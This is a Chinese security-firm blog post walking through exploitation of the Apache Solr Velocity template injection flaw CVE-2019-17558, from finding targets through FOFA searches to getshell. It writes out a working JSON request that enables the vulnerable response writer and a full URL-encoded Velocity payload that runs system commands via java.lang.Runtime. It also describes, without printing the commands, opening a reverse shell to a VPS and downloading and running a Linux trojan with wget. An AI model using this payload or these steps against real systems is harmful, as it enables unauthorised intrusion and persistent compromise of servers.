业务讲堂
技术研究
最新文章
渗透实战 | Solr命令执行漏洞(CVE-2019-17558)getshell
作者:管理员 发表日期:2021/03/08 来源:原创

Apache Solr 代码注入漏洞 (cve-2019-17558)

漏洞影响版本5.0.0 到 8.3.1

漏洞影响:用户可以注入自定义模板,通过Velocity模板语言执行任意命令。

 

漏洞挖掘可以靠fofa搜索,这里面也有很多坑的,这个漏洞前提是要有core的名称才可以利用。

图片.png


如果有core的名称就在地址后面加上 /solr/名称/config,如果是下面这个页面就有可能存在此漏洞。

图片.png


抓包修改为POST请求包,加上poc验证,如果为下面这种回应包,就可以确定有该漏洞。

Poc:

{

  "update-queryresponsewriter": {

    "startup": "lazy",

    "name": "velocity",

    "class": "solr.VelocityResponseWriter",

    "template.base.dir": "",

    "solr.resource.loader.enabled": "true",

    "params.resource.loader.enabled": "true"

  }

图片.png


然后改回GET请求,加上exp,”id”就是命令执行语句的位置。

Exp:

select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

图片.png

 

图片.png

 

 

之后在网上逛了几圈后发现还有exp脚本可以利用

图片.png


在vps上开启监听端口,准备反弹shell,这里反弹的时候要进行一下编码,我用的是url编码。注意一下vps要跟目标机可以实现互通,(当时我怎么也弹不上,之后才知道是vps有问题)。

图片.png

 

图片.png

 

图片.png

 

然后用python开启http服务,并在上面放上Linux的木马文件。

图片.png


在用wget命令下载下来,然后记得给权限在运行。

图片.png

 

过了一段时间成功上线。

图片.png




图片.png





天磊卫士|专注网络安全服务

咨询热线:400-654-0108

官网:https://www.uguardsec.com

分支机构:深圳、海口、北京、青岛、汕尾,上海

漏洞扫描|整改加固|渗透测试|APP安全评估|安全运维

系统入网|上线安全评估|代码审计|应急响应|应急演练


上一篇:CTF | cgpwn2
下一篇:渗透实战 | wordpress博客系统getshell